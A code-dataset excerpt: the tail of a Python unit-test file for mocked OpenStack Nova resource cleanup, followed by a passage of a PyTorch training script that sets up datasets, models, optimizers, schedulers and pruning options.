test_stop_tenant_vms(self):\n        \"\"\"test stop_tenant_vms. 
It checks that the stop method of the mock\n        is called for all the VMs in ACTIVE state\"\"\"\n        vms = self.prepare_vms(self.nova_resources.novaclient)\n        count = self.nova_resources.stop_tenant_vms()\n        self.assertEquals(count, 3)\n        for i in range(3):\n            self.assertTrue(vms[i].stop.called)\n        self.assertFalse(vms[3].stop.called)\n\n    def test_delete_tenant_vms(self):\n        \"\"\"Check that the delete method of each VM is invoked\"\"\"\n        config = {'servers.list.return_value': []}\n        self.nova_resources.novaclient.configure_mock(**config)\n        self.nova_resources.delete_tenant_vms()\n\n    def prepare_keypairs(self, mock):\n        \"\"\"create mock to check operations with keypairs\"\"\"\n        keypairs = list()\n        for i in range(3):\n            keypairs.append(MagicMock(id=i))\n        config = {'keypairs.list.return_value': keypairs}\n        mock.configure_mock(**config)\n        return keypairs\n\n    def test_get_user_keypairs(self):\n        \"\"\"check that the keypair list is obtained\"\"\"\n        self.prepare_keypairs(self.nova_resources.novaclient)\n        result = self.nova_resources.get_user_keypairs()\n        for i in range(3):\n            self.assertEquals(result[i], i)\n\n    def test_delete_user_keypairs(self):\n        \"\"\"check that the delete method is called for each keypair\"\"\"\n        keypairs = self.prepare_keypairs(self.nova_resources.novaclient)\n        self.nova_resources.delete_user_keypairs()\n        for i in range(3):\n            keypairs[i].delete.assert_called_once_with()\n\n    def prepare_groups(self):\n        \"\"\"create 6 security groups to do tests. The first 4 groups have\n        tenant_id == self.nova_resources.tenant_id. The 5th group also has\n        that tenant_id, but has name == 'default'. Finally, the 6th group has\n        a different tenant_id. This is because the default security group\n        and the security groups owned by other tenants should be ignored\"\"\"\n\n        secgroups = list()\n        for i in range(5):\n            secgroup = MagicMock(tenant_id=self.nova_resources.tenant_id, id=i)\n            secgroups.append(secgroup)\n        secgroups[4].name = 'default'\n        secgroups.append(MagicMock(tenant_id='other', id=5))\n        return secgroups\n\n    def test_get_tenant_security_groups(self):\n        \"\"\"check the code that gets the security groups: check that it filters\n        out the default group and the security groups of other tenants\"\"\"\n        secgroups = self.prepare_groups()\n        config = {'security_groups.list.return_value': secgroups}\n        self.nova_resources.novaclient.configure_mock(**config)\n        security_groups = self.nova_resources.get_tenant_security_groups()\n        self.assertTrue(len(security_groups) == 4)\n        for security_id in security_groups:\n            self.assertTrue(security_id < 4)\n\n    def test_delete_tenant_security_groups(self):\n        \"\"\"check that the delete call is invoked on security groups with\n        the same tenant_id as the object and that default is not deleted\"\"\"\n        secgroups = self.prepare_groups()\n        config = {'security_groups.findall.return_value': secgroups}\n        self.nova_resources.novaclient.configure_mock(**config)\n        self.nova_resources.delete_tenant_security_groups()\n        for i in range(4):\n            self.assertTrue(secgroups[i].delete.called)\n        for i in range(4, 6):\n            self.assertFalse(secgroups[i].delete.called)\n","sub_path":"tests/units/test_novaresources.py","file_name":"test_novaresources.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}{"seq_id":"584118712","text":"import argparse\nimport math\nimport logging\nimport time\nimport collections\nimport os.path\nimport pickle\nimport copy\nimport torch.utils.data as data\nimport torch.nn as nn\nimport torch.nn.utils.clip_grad\nimport 
torch.optim as optim\nimport torch.nn.functional as F\nimport torch\nimport torch.optim.lr_scheduler\nimport numpy as np\nimport functools\nfrom contextlib import suppress\nfrom torch.autograd import Variable\n\n\n\nfrom .datatools import set_simp \nfrom .datatools import set_polarity\nfrom .datatools import set_cifar_challenge\nfrom .datatools import sequence_classification\nfrom .datatools import basic_classification\nfrom .datatools import img_tools\nfrom .datatools.basic_classification import DataType\nfrom .datatools import word_vectors\nfrom .modules import maxpool_lstm\nfrom .modules import squeezenet\nfrom .modules import kim_cnn\nfrom .modules import coupled_ensemble\nfrom .modules import countmult\nfrom .monitoring import reporting\nfrom .monitoring import tb_log\nfrom .genutil import modules as genutil_modules\nfrom .genutil import optimutil\nfrom .modules import reset_masks\nfrom . import __main__ as mainfuncs\nfrom .modules import saveable_data_par \nfrom .genutil import modules\nfrom torchvision import transforms\nimport torchvision.datasets as tvds\nimport candle.prune\nimport candle.proxy\ndef add_args(parser):\n    if parser is None:\n        parser= argparse.ArgumentParser() \n    parser.add_argument(\"--dataset_for_classification\",type=str,choices=[\"simple\",\"moviepol\", \"mnist\", \"cifar_challenge\", \"cifar10\", \"minicifar10\"],default=\"simple\")\n\n    parser.add_argument(\"--ds_path\", type=str,default=None)\n    parser.add_argument(\"--fasttext_path\", type=str,default=\"../data/fastText_word_vectors/\" )\n    parser.add_argument(\"--data_trim\", type=int, default=30000)\n    parser.add_argument(\"--lstm_hidden_dim\", type = int, default =300)\n    parser.add_argument(\"--maxlstm_dropout_rate\", type = float, default = 0.5)\n    parser.add_argument(\"--reports_per_epoch\", type=int,default=10)\n    parser.add_argument(\"--save_prefix\", type=str,default=None)\n    parser.add_argument(\"--model_type\", type=str, choices=[\"maxpool_lstm_fc\", \"kimcnn\", \"squeezenet\", \"shufflenet\"],default=\"maxpool_lstm_fc\")\n    parser.add_argument(\"--cifar_random_erase\", action=\"store_true\")\n    parser.add_argument(\"--classification_loss_type\",type=str, choices=[\"cross_entropy\", \"nll\", \"square_hinge\"], default=\"cross_entropy\")\n    parser.add_argument(\"--coupled_ensemble\",type=str, choices=[\"on\", \"off\"], default=\"off\")\n    parser.add_argument(\"--coupled_ensemble_size\", type=int, default=4)\n    \n    \n\n    parser.add_argument(\"--cifar_shuffle_val_set\",action=\"store_true\")\n    \n    parser.add_argument(\"--use_custom_test_data_file\",action=\"store_true\")\n    parser.add_argument(\"--custom_test_data_file\")\n    parser.add_argument(\"--num_custom_test_file_points\", type=int, default=1000)\n\n    parser.add_argument(\"--multi_score_model\",action=\"store_true\") #for use with models that, like branchynet, produce multiple score outputs at train time\n    parser.add_argument(\"--multi_score_unit_weighting\",action=\"store_true\")#losses all get same weight\n    parser.add_argument(\"--multi_score_loss_weighting\",nargs=\"+\" ) #weight for the losses derived from each of the scores \n\n    parser.add_argument(\"--use_val_as_test\",action=\"store_true\")\n\n    kim_cnn.add_args(parser)\n    squeezenet.add_args(parser)\n    \n    return parser\n\n\nclass Context:\n    def __init__(self, model, train_loader, val_loader, optimizer,indexer, category_names, tb_writer, train_size, data_type, scheduler, test_loader,cuda, holdout_loader, num_categories, model_parameters):\n        self.model=model\n        self.train_loader=train_loader\n        
self.val_loader=val_loader\n        self.holdout_loader= holdout_loader\n        self.optimizer=optimizer\n        self.category_names=category_names\n        self.tb_writer=tb_writer\n        self.train_size=train_size\n        self.data_type=data_type\n        self.scheduler=scheduler\n        self.test_loader=test_loader\n        self.cuda=cuda\n        self.num_categories=num_categories\n        self.model_parameters = model_parameters\n\n        \n        self.stashfile=None\n\n    def stash_model(self):\n        self.stashfile = \"../temp/temp_storage_\"+str(id(self))\n        torch.save(self.model, self.stashfile)\n        self.model=None\n    def unstash_model(self):\n        self.model=torch.load(self.stashfile)\n        if self.cuda:\n            self.model=self.model.cuda()\n        self.stashfile=None\n\n\ndef make_context(args):\n    holdout_loader =None\n    if args.enable_l0reg or args.proxy_context_type == \"l0reg_context\" :\n        assert args.enable_l0reg and args.proxy_context_type == \"l0reg_context\" \n    if args.enable_l1reg or args.proxy_context_type == \"l1reg_context_slimming\":\n        assert args.enable_l1reg and args.proxy_context_type == \"l1reg_context_slimming\"\n    assert args.save_prefix is not None \n    if args.dataset_for_classification == \"simple\":\n        if args.save_prefix is None:\n            args.save_prefix=\"simplification_classification\"\n        if args.ds_path is None:\n            args.ds_path= \"../data/sentence-aligned.v2\" \n        train_dataset, val_dataset, index2vec, indexer = set_simp.load(args)\n        category_names={0:\"normal\",1:\"simple\"}\n        data_type=DataType.SEQUENCE\n    elif args.dataset_for_classification == \"moviepol\":\n        if args.save_prefix is None:\n            args.save_prefix= \"moviepol\"\n        if args.ds_path is None:\n            args.ds_path = \"../data/rt-polaritydata\"\n        train_dataset, val_dataset, index2vec, indexer = set_polarity.load(args)\n        category_names={0:\"negative\",1:\"positive\"}\n        data_type=DataType.SEQUENCE\n    elif args.dataset_for_classification == \"mnist\":\n        num_categories =10\n        train_dataset = tvds.MNIST('../data/mnist', train=True, download=True, transform=transforms.Compose([transforms.ToTensor(),transforms.Normalize((0,), (1,))]))\n        val_dataset = tvds.MNIST('../data/mnist', train=False, download=True, transform=transforms.Compose([transforms.ToTensor(),transforms.Normalize((0,), (1,))]))\n        category_names={i: str(i) for i in range(10)}  # digit labels 0-9\n        data_type = DataType.IMAGE \n        test_dataset=val_dataset #for testing\n    elif args.dataset_for_classification == \"cifar_challenge\":\n        num_categories = 100\n        data_type = DataType.IMAGE\n        f=open(\"./local_data/cifar/train_data\",\"rb\")\n        squashed_images=pickle.load(f)\n        labels=pickle.load(f)\n        f.close()\n        train_dataset,val_dataset = set_cifar_challenge.make_train_val_datasets(squashed_images, labels, args.validation_set_size, transform=None, shuf=args.cifar_shuffle_val_set) \n        tr = transforms.Compose([transforms.RandomCrop(size=32 ,padding= 4), transforms.RandomHorizontalFlip(), transforms.ToTensor() ])\n        if args.cifar_random_erase:\n            tr=transforms.Compose([tr, img_tools.RandomErase()])\n        if args.holdout:\n            holdout_dataset, val_dataset = val_dataset.split(args.holdout_size)\n        train_dataset.transform = tr\n        val_dataset.transform = transforms.ToTensor()\n        \n        if args.mode == \"train\":\n            pass\n            test_dataset=None\n        elif args.mode == \"test\":\n            if args.use_custom_test_data_file:\n                f=open(args.custom_test_data_file,\"rb\")\n            else:\n                f=open(\"./local_data/cifar/test_data\",\"rb\")\n            squashed_images=pickle.load(f)[:args.num_custom_test_file_points]\n            test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=[-1]*squashed_images.shape[0], 
transform=transforms.ToTensor())\n f.close()\n\n\n category_names= { k:v for k,v in enumerate(set_cifar_challenge.CIFAR100_LABELS_LIST)}\n elif args.dataset_for_classification == \"cifar10\":\n num_categories = 10\n data_type = DataType.IMAGE\n tr = transforms.Compose([transforms.RandomCrop(size=32 ,padding= 4), transforms.RandomHorizontalFlip(), transforms.ToTensor() ])\n if args.cifar_random_erase:\n tr=transforms.Compose([tr, img_tools.RandomErase()])\n\n f=open('./local_data/cifar10/cifar-10-batches-py/data_batch_1','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n for i in range(2,6):\n f=open('local_data/cifar10/cifar-10-batches-py/data_batch_'+str(i),'rb')\n dictionary = pickle.load(f, encoding='bytes')\n squashed_images = np.concatenate((squashed_images, dictionary[b'data']),axis=0)\n labels.extend(dictionary[b'labels'])\n f.close()\n\n train_dataset, val_dataset = set_cifar_challenge.make_train_val_datasets(squashed_images, labels, args.validation_set_size, transform=None, shuf=args.cifar_shuffle_val_set) \n train_dataset.transform = tr\n val_dataset.transform = transforms.ToTensor()\n f=open('./local_data/cifar10/cifar-10-batches-py/test_batch','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=labels, transform=transforms.ToTensor())\n if args.use_val_as_test:\n test_dataset=val_dataset\n\n \n #train_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=True, download= True, transform=tr ) \n #val_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=False, download= True, transform=transforms.ToTensor() ) \n category_names = {0:\"airplane\", 1:\"automobile\", 2:\"bird\", 3:\"cat\", 4:\"deer\", 5:\"dog\", 6:\"frog\", 7:\"horse\", 8: \"ship\", 9: \"truck\" }\n if args.use_custom_test_data_file:\n f=open(args.custom_test_data_file,\"rb\")\n dictionary = pickle.load(f,encoding='bytes')\n squashed_images=dictionary[b'data'][:args.num_custom_test_file_points]\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=dictionary[b'labels'][:args.num_custom_test_file_points], transform=transforms.ToTensor())\n f.close()\n elif args.dataset_for_classification == \"minicifar10\":\n minicifar_size=200+args.validation_set_size \n num_categories = 10\n data_type = DataType.IMAGE\n tr = transforms.Compose([transforms.RandomCrop(size=32 ,padding= 4), transforms.RandomHorizontalFlip(), transforms.ToTensor() ])\n if args.cifar_random_erase:\n tr=transforms.Compose([tr, img_tools.RandomErase()])\n\n f=open('./local_data/cifar10/cifar-10-batches-py/data_batch_1','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n for i in range(2,6):\n f=open('local_data/cifar10/cifar-10-batches-py/data_batch_'+str(i),'rb')\n dictionary = pickle.load(f, encoding='bytes')\n squashed_images = np.concatenate((squashed_images, dictionary[b'data']),axis=0)\n labels.extend(dictionary[b'labels'])\n f.close()\n #remove most images to make minicifar\n squashed_images=squashed_images[:minicifar_size,:]\n labels=labels[:minicifar_size]\n logging.info(\"Counts of labels in minicifar:{}\".format(collections.Counter(labels[args.validation_set_size:minicifar_size])))\n train_dataset, val_dataset = set_cifar_challenge.make_train_val_datasets(squashed_images, labels, 
args.validation_set_size, transform=None, shuf=args.cifar_shuffle_val_set) \n train_dataset.transform = tr\n val_dataset.transform = transforms.ToTensor()\n\n f=open('./local_data/cifar10/cifar-10-batches-py/test_batch','rb')\n dictionary=pickle.load(f,encoding=\"bytes\")\n squashed_images = dictionary[b'data']\n labels = dictionary[b'labels']\n f.close()\n test_dataset= set_cifar_challenge.Dataset(data=squashed_images, labels=labels, transform=transforms.ToTensor())\n if args.use_val_as_test:\n test_dataset=val_dataset\n\n \n #train_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=True, download= True, transform=tr ) \n #val_dataset = tvds.CIFAR10(\"./local_data/cifar10/\", train=False, download= True, transform=transforms.ToTensor() ) \n category_names = {0:\"airplane\", 1:\"automobile\", 2:\"bird\", 3:\"cat\", 4:\"deer\", 5:\"dog\", 6:\"frog\", 7:\"horse\", 8: \"ship\", 9: \"truck\" }\n\n\n\n\n\n else:\n raise Exception(\"Unknown dataset.\")\n \n\n\n logging.info(\"using save prefix \"+str(args.save_prefix))\n\n\n if data_type == DataType.SEQUENCE:\n embedding=word_vectors.embedding(index2vec, indexer.n_words,300)\n train_loader= data.DataLoader(train_dataset,batch_size = args.batch_size,shuffle = True,collate_fn = sequence_classification.make_collater(args))\n val_loader= data.DataLoader(val_dataset,batch_size = args.batch_size, shuffle = False, collate_fn = sequence_classification.make_collater(args))\n elif data_type == DataType.IMAGE:\n indexer= None\n if args.mode == \"train\": #can probably remove this if block. Now we have all loaders availible in all modes\n train_loader=data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle= True, collate_fn=basic_classification.make_var_wrap_collater(args), drop_last= args.drop_last_training_batch)\n val_loader=data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args,volatile=True ))\n test_loader = data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args, volatile=True)) if test_dataset is not None else None\n elif args.mode == \"test\":\n train_loader=data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle= True, collate_fn=basic_classification.make_var_wrap_collater(args))\n test_loader = data.DataLoader(test_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args, volatile=True))\n val_loader = data.DataLoader(val_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args)) #certain ensemble methods use the val dataset \n assert(args.resume_mode == \"standard\" or args.resume_mode == \"ensemble\")\n # if args.holdout:\n # holdout_loader=data.DataLoader(holdout_dataset, batch_size=args.batch_size, shuffle= False, collate_fn=basic_classification.make_var_wrap_collater(args,volatile=True))\n else:\n raise Exception(\"Unknown data type.\")\n \n \n if args.model_type == \"maxpool_lstm_fc\":\n model=maxpool_lstm.MaxPoolLSTMFC.from_args(embedding, args) \n elif args.model_type == \"kimcnn\":\n model=kim_cnn.KimCNN.from_args(embedding,args) \n elif args.model_type == \"squeezenet\":\n model=squeezenet.SqueezeNet.from_args(args)\n if args.l0reg_lambda_vary_by_layer:\n model.set_lambd_by_subblock(lambd_first=args.l0reg_lambda_vary_first, lambd_last=args.l0reg_lambda_vary_last)\n if args.l0reg_lambda_vary_by_sublayer_name:\n name_dict={}\n 
name_dict[\"squeeze_conv\"]=args.l0reg_lambda_squeeze_conv\n name_dict[\"group_conv\"]= args.l0reg_lambda_group_conv\n name_dict[\"expand_conv\"]=args.l0reg_lambda_expand_conv\n model.set_l0_lambda_by_name(name_dict)\n\n else:\n raise Exception(\"Unknown model\")\n\n\n if args.cuda and not args.data_par_enable:\n model=model.cuda()\n if args.coupled_ensemble ==\"on\":\n assert args.classification_loss_type == \"nll\"\n model_list = []\n for i in range(args.coupled_ensemble_size):\n cur_model=copy.deepcopy(model)\n cur_model.init_params()\n model_list.append(cur_model)\n model = coupled_ensemble.CoupledEnsemble(model_list)\n elif args.coupled_ensemble != \"off\":\n raise Exception(\"Unknown coupled ensemble settting\")\n\n if args.proxy_context_type == \"no_context\":\n model_parameters = model.parameters()\n else:\n if args.enable_l0reg:\n assert args.use_all_params\n elif args.enable_l1reg:\n assert not args.use_all_params #in the network slimming case, we do not optimize over the masks. They are set to zero based on a pruning scheule\n if args.use_all_params:\n model_parameters = model.proxy_ctx.list_params()\n else: \n model_parameters = model.proxy_ctx.list_model_params()\n \n\n if args.optimizer == \"sgd\":\n optimizer=optim.SGD(model_parameters,lr=args.init_lr, momentum=args.sgd_momentum, weight_decay=args.sgd_weight_decay )\n \n elif args.optimizer == \"rmsprop\":\n optimizer = optim.RMSprop(model_parameters, lr=args.init_lr)\n elif args.optimizer == \"adam\":\n optimizer = optim.Adam(model_parameters, lr=args.init_lr)\n else:\n raise Exception(\"Unknown optimizer.\") \n\n if args.lr_scheduler == \"exponential\":\n scheduler = torch.optim.lr_scheduler.ExponentialLR(optimizer,args.lr_gamma)\n elif args.lr_scheduler == \"plateau\":\n scheduler= torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode=\"max\", verbose=True, patience=args.plateau_lr_scheduler_patience)\n elif args.lr_scheduler == \"linear\":\n lam = lambda epoch: 1-args.linear_scheduler_subtract_factor* min(epoch,args.linear_scheduler_max_epoch)/args.linear_scheduler_max_epoch \n scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lam )\n elif args.lr_scheduler == \"multistep\":\n milestones=[args.multistep_scheduler_milestone1, args.multistep_scheduler_milestone2]\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=milestones, gamma=args.lr_gamma )\n elif args.lr_scheduler == \"epoch_anneal\":\n if args.epoch_anneal_init_period>0:\n Tmax = args.epoch_anneal_init_period\n else:\n Tmax=args.num_epochs//args.epoch_anneal_numcycles\n scheduler= optimutil.MyAnneal(optimizer=optimizer, Tmax=Tmax, init_lr=args.init_lr)\n elif args.lr_scheduler is None or args.lr_scheduler == \"none\":\n scheduler = None\n else: \n raise Exception(\"Unknown Scheduler\")\n\n\n if args.mode ==\"train\":\n pass\n train_size=len(train_dataset)\n # test_loader = None\n elif args.mode==\"test\":\n pass\n train_size= None\n # train_loader = None\n\n return Context(model, train_loader, val_loader, optimizer, indexer, category_names=category_names, tb_writer=tb_log.TBWriter(\"{}_\"+args.save_prefix), train_size=train_size, data_type=data_type, scheduler=scheduler, test_loader=test_loader, cuda=args.cuda, holdout_loader= holdout_loader, num_categories = num_categories, model_parameters=model_parameters)\n\n\n\n\n\n\ndef run(args, ensemble_test=False):\n if ensemble_test:\n assert type(args) is list\n contexts=[] #[make_context(arg_instance) for arg_instance in args ]\n for arg_instance in args:\n 
contexts.append(make_context(arg_instance))\n contexts[-1].stash_model()\n for context, arg_instance in zip(contexts,args):\n logging.info(\"loading saved model from file: \"+arg_instance.res_file)\n context.unstash_model()\n context.model.load(os.path.join(arg_instance.model_save_path, arg_instance.res_file))\n context.stash_model()\n if args[0].weight_ensemble_on_validation_set:\n meta_model = basic_classification.optimize_ensemble_on_val(contexts, contexts[0].val_loader)\n else:\n meta_model = None\n basic_classification.make_ensemble_prediction_report(contexts, contexts[0].test_loader, args[0].test_report_filename, meta_model=meta_model)\n return\n\n context=make_context(args) \n if args.resume_mode == \"standard\":\n logging.info(\"loading saved model from file: \"+args.res_file)\n context.model.load(os.path.join(args.model_save_path, args.res_file), strict= not args.load_nonstrict)\n if args.adjust_out_dim_after_loading:\n context.model.adjust_out_dim(args.new_out_dim, linear=args.new_final_linear,spatial_dim=args.squeezenet_final_side_length )\n if args.born_again_enable:\n if args.born_again_args_file is not None:\n logging.info(\"loading born again args from \"+args.born_again_args_file)\n previous_incarnation_context=make_context( mainfuncs.get_args_from_files([args.born_again_args_file]) [0])\n else:\n previous_incarnation_context=make_context(args)\n logging.info(\"loading previous incarnation from file: \"+str(args.born_again_model_file))\n previous_incarnation_context.model.load(os.path.join(args.born_again_model_file))\n for param in previous_incarnation_context.model.parameters():\n param.requires_grad = False\n if args.print_model:\n logging.info(repr(context.model))\n return\n\n if args.reset_masks_after_loading:\n reset_masks.reset_masks(context.model)\n \n\n if args.plot_unpruned_masks:\n import matplotlib.pyplot as plt\n import numpy as np\n plot_dict = context.model.prop_nonzero_masks() \n fig, ax = plt.subplots()\n for label, props in plot_dict.items():\n layer_nums = np.arange(0,len(props))\n np_props = np.asarray(props)\n ax.plot(layer_nums, np_props, label=label)\n legend = ax.legend(loc='upper left')\n ax.set(xlabel=\"residual unit #\", ylabel = \"proportion of masks unpruned\", title=args.plot_title)\n plt.show()\n return\n\n if args.plot_flop_reduction_by_layer:\n import matplotlib.pyplot as plt\n import numpy as np\n img_h, img_w, channels = get_dims_from_dataset(args.dataset_for_classification) \n props, _ = context.model.prop_flop_reduction(img_h = img_h, img_w= img_w, input_channels = channels) \n fig, ax = plt.subplots()\n layer_nums = np.arange(0,len(props))\n np_props = np.asarray(props)\n ax.plot(layer_nums, np_props)\n ax.set(xlabel=\"residual unit #\", ylabel = \"pruned flops / unpruned flops\", title=args.plot_title)\n plt.show()\n return\n\n if args.plot_absolute_flop_reduction_by_layer:\n import matplotlib.pyplot as plt\n import numpy as np\n img_h, img_w, channels = get_dims_from_dataset(args.dataset_for_classification) \n _, difs = context.model.prop_flop_reduction(img_h = img_h, img_w= img_w, input_channels = channels) \n fig, ax = plt.subplots()\n layer_nums = np.arange(0,len(difs))\n np_difs = np.asarray(difs)\n ax.plot(layer_nums, np_difs)\n ax.set(xlabel=\"residual unit #\", ylabel = \"unpruned flops - pruned_flops\", title=args.plot_title)\n plt.show()\n return\n\n\n\n\n if args.mode == \"test\":\n basic_classification.make_prediction_report(context, context.test_loader,args.test_report_filename, no_grad=args.use_nograd) \n if 
args.dataset_for_classification == \"cifar_challenge\" or args.dataset_for_classification == \"cifar10\":\n img_h=32\n img_w=32\n channels=3\n logging.info(\"multiplies performed by tested model \"+ str(countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels))) \n\n return\n \n if args.lr_scheduler == \"epoch_anneal\":\n epoch_anneal_cur_cycle=0\n \n \n context.tb_writer.write_hyperparams()\n timestamp=reporting.timestamp()\n \n report_interval=max(len(context.train_loader) // args.reports_per_epoch ,1)\n accumulated_loss=0 \n if args.enable_l1reg:\n accumulated_l1l=0\n if args.enable_l2reg_stochastic:\n accumulated_l2l_stochastic=0\n\n param_count=genutil_modules.count_trainable_params(context.model)\n if args.proxy_context_type == \"no_context\": \n param_count = modules.count_trainable_params(context.model)\n else:\n param_count = modules.count_elem(context.model.proxy_ctx.list_model_params() ) \n\n logging.info(\"Number of parameters: \"+ str(param_count))\n context.tb_writer.write_num_trainable_params(param_count)\n\n\n if args.factorize_trained:\n context.model.eval()\n if args.dataset_for_classification == \"cifar_challenge\" or args.dataset_for_classification == \"cifar10\":\n img_h=32\n img_w=32\n channels=3\n logging.info(\"multiplies before factorization: \"+ str(countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels))) \n \n if args.factorize_trained_method == \"svd\":\n with torch.no_grad():\n logging.info(\"svd factorizing model\")\n context.model.proxy_ctx.save_samples_all()\n for i,(batch_in, *other) in enumerate(context.train_loader): \n if i>=20:\n break\n context.model(batch_in)\n context.model.proxy_ctx.factorize_all(strategy=\"svd\",rank_prop=args.factorize_svd_rank_prop) \n context.model.proxy_ctx.clear_samples_all()\n logging.info(\"multiplies after factorization: \"+ str(countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels))) \n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_svd_factorize_\" + str(args.factorize_svd_rank_prop) ) )\n else:\n raise Exception(\"Unknown factorization method\")\n return\n\n if args.count_multiplies:\n context.model.eval() #for sampling to compute avg mults in forking models\n if args.get_forking_props_on_val:\n squeezenet.forking_props_from_sample(context.model,context.val_loader )\n if args.count_mult_override_img_dims:\n img_h = args.count_mult_override_imgh\n img_w = args.count_mult_override_imgw\n channels=3\n elif args.dataset_for_classification == \"cifar_challenge\" or args.dataset_for_classification ==\"cifar10\":\n img_h=32\n img_w=32\n channels=3\n cm = countmult.count_approx_multiplies(context.model, img_h=img_h, img_w=img_w, input_channels=channels)\n if args.short_test_report:\n print(cm)\n else:\n print(\"Approx number of multiplies: \",cm ) \n return\n\n\n if args.set_prune_deemph:\n context.model.deemph_string(args.prune_deemph_string)\n\n if args.enable_pruning:\n init_mask_count = context.model.proxy_ctx.count_unpruned_masks()\n logging.info(\"Initial number of masks {}\".format(init_mask_count))\n if args.autocalc_prune_unit:\n if args.prune_calc_type ==\"relative\":\n assert not args.sense_adaptive_pruning \n prune_unit = math.ceil((1- (args.prune_target_frac)**(1/args.prune_phase_duration))*100)\n logging.info(\"relative prune unit is {}\".format(prune_unit))\n elif args.prune_calc_type ==\"absolute\":\n assert args.sense_adaptive_pruning\n prune_abs_unit = 
math.ceil( (1-args.prune_target_frac)/args.prune_phase_duration*100 )\n logging.info(\"absolute prune unit is {}\".format(prune_abs_unit))\n else:\n prune_unit = args.prune_unit\n prune_abs_unit= prune_unit\n if args.prune_target_frac is not None:\n prune_target = int(init_mask_count *args.prune_target_frac )\n else:\n prune_target =args.prune_target\n logging.info(\"Target number of masks is : {}\".format(prune_target))\n\n if args.prune_trained:\n if args.prune_trained_hz:\n assert args.hz_lasso_target_prop is None #use prune_trained_pct \n before_score=basic_classification.evaluate(context, context.val_loader,no_grad=args.use_nograd)\n logging.info(\"accuracy before hz_lasso: {} \".format(before_score ) )\n hz_loader = context.train_loader if args.hz_lasso_use_train_loader else context.val_loader\n prop =(100 -args.prune_trained_pct)/100\n hz_lasso_whole_model(context, args,num_samples= args.hz_lasso_num_samples,target_prop= prop, loader=hz_loader,solve_for_weights =args.hz_lasso_solve_for_weights)\n after_score=basic_classification.evaluate(context, context.val_loader,no_grad=args.use_nograd)\n logging.info(\"accuracy after hz_lasso{}\".format(after_score))\n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_prune_\" + str(args.prune_trained_pct) ) )\n if not args.short_test_report:\n context.model.display_subblock_nonzero_masks(nodesc=args.verbose_prune_trained_nodesc)\n return\n elif args.group_prune_strategy == \"taylor\":\n #logging.info(\"pruning trained model using taylor method\")\n taylor_sample_batches(context,args)\n prunefunc = get_pruning_func(context, args)\n prunefunc(args.prune_trained_pct)\n n_unpruned = context.model.proxy_ctx.count_unpruned_masks()\n logging.info(\"Unpruned masks: \"+str(n_unpruned))\n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_prune_taylor_\" + str(args.prune_trained_pct) ) )\n #taylor_sample_clear(context, args)\n if args.verbose_prune_trained:\n context.model.display_subblock_nonzero_masks(nodesc=args.verbose_prune_trained_nodesc)\n\n return\n \n else:\n\n prunefunc = get_pruning_func(context, args)\n if args.iterative_prune_trained: \n assert args.prune_absolute\n init_mask_count = context.model.proxy_ctx.count_unpruned_masks()\n target_mask_count=math.ceil(init_mask_count*(100-args.prune_trained_pct)/100 )\n while True:\n if context.model.proxy_ctx.count_unpruned_masks()<= target_mask_count:\n break \n prunefunc(1)\n else:\n prunefunc(args.prune_trained_pct)\n # context.model.display_subblock_nonzero_masks()\n # import pdb; pdb.set_trace()\n\n model_copy = copy.deepcopy(context.model)\n if args.recalc_weights_after_prune_trained:\n recalc_weights_pruned(context, args, num_samples=3, loader=context.train_loader, model_copy=model_copy)\n n_unpruned = context.model.proxy_ctx.count_unpruned_masks()\n logging.info(\"Unpruned masks: \"+str(n_unpruned))\n context.model.save(os.path.join( args.model_save_path, args.res_file+\"_prune_\" + str(args.prune_trained_pct) ) )\n if args.verbose_prune_trained:\n context.model.display_subblock_nonzero_masks()\n return\n\n\n if args.sensitivity_report:\n one_layer_prune_func = get_one_layer_pruning_func(context,args,prune_abs_unit)\n accs= by_block_accuracies(context, args, prune_abs_unit, one_layer_prune_func)\n logging.info(accs)\n return\n\n if args.do_condense:\n conds_so_far=0\n\n if args.terminate_after_pruning:\n iter_after_pruning=0\n\n if args.reset_weights_before_start:\n logging.info(\"resetting weights\")\n context.model.reset_weights()\n\n\n if 
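# --- Added worked example (values hypothetical): the two prune-unit formulas
# --- above behave differently. The relative unit removes a percentage of the
# --- *remaining* masks at each pruning event; the absolute unit removes a fixed
# --- share of the *initial* masks at each event.
import math
prune_target_frac = 0.5    # keep 50% of the masks (illustrative setting)
prune_phase_duration = 10  # number of pruning events (illustrative setting)
rel = math.ceil((1 - prune_target_frac ** (1 / prune_phase_duration)) * 100)
print(rel)  # 7: pruning 7% of the remaining masks 10 times leaves ~0.93**10, about 48%
abs_unit = math.ceil((1 - prune_target_frac) / prune_phase_duration * 100)
print(abs_unit)  # 5: pruning 5% of the initial masks 10 times removes exactly 50%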
